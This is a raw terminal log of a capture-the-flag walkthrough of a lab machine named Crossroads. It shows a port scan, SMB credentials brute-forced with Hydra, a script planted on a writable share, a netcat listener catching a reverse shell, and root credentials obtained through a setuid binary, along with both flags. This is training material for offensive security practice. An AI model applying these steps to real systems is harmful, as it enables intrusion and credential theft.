root@kali:~# nmap -A -p- 192.168.43.38
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-18 16:57 CEST
Nmap scan report for 192.168.43.38
Host is up (0.00071s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/crossroads.png
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:D0:67:22 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: Host: CROSSROADS

Host script results:
|_clock-skew: mean: 3h39m59s, deviation: 2h53m12s, median: 1h59m59s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2021-04-18T11:58:13-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-18T16:58:13
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   0.71 ms 192.168.43.38

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.65 seconds

Hydra on SMB
albert:bradley1

root@kali:~/CTF/Crossroad# smbclient \\\\192.168.43.38\\smbshare -U albert
Enter WORKGROUP\albert's password: 
Try "help" to get a list of possible commands.
smb: \> 
smb: \> 
smb: \> ls
  .                                   D        0  Sun Apr 18 19:26:58 2021
  ..                                  D        0  Sat Mar  6 13:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 23:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> 
smb: \> put 
beroot         notes.txt      robots.txt     smbscript.sh   
hydra.restore  note.txt       smb.conf       user.txt       
smb: \> put smbscript.sh 



root@kali:~/CTF/Crossroad# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.43.254] from (UNKNOWN) [192.168.43.38] 53912
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)


albert@crossroads:/home/albert$ ls -la
ls -la
total 1584
drwxr-xr-x 3 albert albert    4096 Mar  6 06:45 .
drwxr-xr-x 3 root   root      4096 Mar  2 16:00 ..
-rwsr-xr-x 1 root   root     16664 Mar  2 17:02 beroot
-rw-r--r-- 1 albert albert 1583196 Mar  2 16:34 crossroads.png
drwxrwxrwx 2 albert albert    4096 Apr 18 12:29 smbshare
-r-x------ 1 albert albert    1805 Jan  3 11:56 user.txt
albert@crossroads:/home/albert$ 

albert@crossroads:/home/albert$ cat user.txt
cat user.txt
flag 1/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░░░░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░░▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█




albert@crossroads:/home/albert$ ./beroot
./beroot
TERM environment variable not set.
enter password for root
-----------------------

password: lemuel
lemuel
do ls and find root creds
albert@crossroads:/home/albert$ ls
ls
beroot  crossroads.png  rootcreds  smbshare  user.txt
albert@crossroads:/home/albert$ 

albert@crossroads:/home/albert$ cat rootcreds
cat rootcreds
root
___drifting___
albert@crossroads:/home/albert$ su root
su root
Password: ___drifting___

root@crossroads:/home/albert# cd /root
cd /root
root@crossroads:~# ls
ls
beroot.sh  creds  passwd  root.txt
root@crossroads:~# cat creds     
cat creds
root
___drifting___
root@crossroads:~# cat passwd
cat passwd
cat: passwd: Is a directory
root@crossroads:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
░▐████░░▄▀█▀█▄▄▄▄▄█▀▄▀▄
░░█░░▌░█░░░▀▄░█▀█░▄▀░░░█
░░█░░▌░█░░█░░█░░░█░░█░░█
░░█░░▀▀░░██░░█░░░█░░█░░█
░░░▀▀▄▄▀▀░█░░░▀▄▀▀▀▀█░░█

congratulations!

root@crossroads:~# cd passwd
cd passwd
root@crossroads:~/passwd# ls 
ls
lemuel
root@crossroads:~/passwd# ls -la
ls -la
total 8
drwxr-xr-x 2 root root 4096 Mar  2 16:22 .
drwx------ 4 root root 4096 Apr 18 12:45 ..
-rw-r--r-- 1 root root    0 Mar  2 16:22 lemuel
root@crossroads:~/passwd# cat lemel
cat lemel
cat: lemel: No such file or directory
root@crossroads:~/passwd# lemuel
lemuel
bash: lemuel: command not found
root@crossroads:~/passwd# cat lemuel
cat lemuel
root@crossroads:~/passwd# 

